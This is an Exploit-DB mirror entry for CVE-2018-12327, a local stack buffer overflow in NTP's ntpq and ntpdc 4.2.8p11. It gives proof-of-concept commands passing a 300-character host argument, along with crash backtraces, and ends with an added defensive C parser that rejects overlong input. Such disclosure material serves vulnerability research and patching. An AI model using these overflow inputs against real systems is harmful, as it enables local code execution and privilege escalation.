exploit-db-mirror/exploits/linux/dos/44909.txt
Offensive Security ac267cb298 DB: 2018-06-21
11 changes to exploits/shellcodes

Redis 5.0 - Denial of Service
ntp 4.2.8p11 - Local Buffer Overflow (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Mirasys DVMS Workstation 5.12.6 - Path Traversal
MaDDash 2.0.2 - Directory Listing
NewMark CMS 2.1 - 'sec_id' SQL Injection
TP-Link TL-WA850RE - Remote Command Execution
Apache CouchDB < 2.1.0 - Remote Code Execution
IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)
VideoInsight WebClient 5 - SQL Injection
2018-06-21 05:01:44 +00:00


# Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow
# Date: 2018-06-06
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: http://www.ntp.org/
# Software Link: http://www.ntp.org/downloads.html
# Version: 4.2.8p11 and earlier
# Tested on: 4.2.8p11
# CVE : CVE-2018-12327
Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.
$ ./ntpq -4 [`python -c 'print "A" * 300'`]
#0 0x562fcada86ce in openhost /home/user/ntp-4.2.8p11/ntpq/ntpq.c:655:12
#1 0x562fcada5f2a in ntpqmain /home/user/ntp-4.2.8p11/ntpq/ntpq.c:606:10
#2 0x562fcada4729 in main /home/user/ntp-4.2.8p11/ntpq/ntpq.c:469:9
#3 0x7f79b684982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x562fcac96d88 in _start (/home/user/ntp-4.2.8p11/ntpq/ntpq+0xacd88)
$ ./ntpdc -4 [`python -c 'print "A" * 300'`]
#0 0x55f726641efe in openhost /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:413:12
#1 0x55f7266400d4 in ntpdcmain /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:365:10
#2 0x55f72663f269 in main /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:255:9
#3 0x7f0fc632382f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x55f7265362d8 in _start (/home/user/ntp-4.2.8p11/ntpdc/ntpdc+0x9d2d8)
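
Added example, not part of the original advisory and not NTP source code: a bounded parser for the bracketed host argument used in the two commands above, which rejects a literal that does not fit the destination buffer instead of copying it. The names parse_bracketed_host, try_length and HOST_BUF_LEN (256) are hypothetical, and requiring ']' to be the last character is a choice made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size; the real tools define their own hostname buffer length. */
#define HOST_BUF_LEN 256

/* Copy the text between '[' and ']' of arg into out (capacity out_len).
 * Returns 0 on success, -1 if arg is not a well-formed "[host]" literal
 * or the host part would not fit in out together with its terminator. */
int parse_bracketed_host(const char *arg, char *out, size_t out_len)
{
    const char *end;
    size_t len;

    if (arg == NULL || out == NULL || out_len == 0 || arg[0] != '[')
        return -1;
    end = strchr(arg + 1, ']');
    if (end == NULL || end[1] != '\0')   /* unterminated, or trailing junk */
        return -1;
    len = (size_t)(end - (arg + 1));
    if (len == 0 || len >= out_len)      /* empty, or too long for out */
        return -1;
    memcpy(out, arg + 1, len);
    out[len] = '\0';
    return 0;
}

/* Constructed input: "[" followed by n 'A' characters and "]". */
int try_length(size_t n)
{
    char arg[1024], host[HOST_BUF_LEN];

    if (n + 3 > sizeof(arg))
        return -1;
    arg[0] = '[';
    memset(arg + 1, 'A', n);
    arg[n + 1] = ']';
    arg[n + 2] = '\0';
    return parse_bracketed_host(arg, host, sizeof(host));
}

int main(void)
{
    printf("255 -> %d, 300 -> %d\n", try_length(255), try_length(300));
    return 0;
}
```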